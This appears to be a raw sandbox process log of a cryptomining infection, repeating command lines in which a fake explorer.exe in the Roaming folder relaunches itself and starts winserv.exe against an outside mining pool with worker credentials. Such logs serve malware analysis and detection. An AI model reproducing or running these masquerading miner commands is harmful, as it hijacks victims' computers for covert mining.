cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
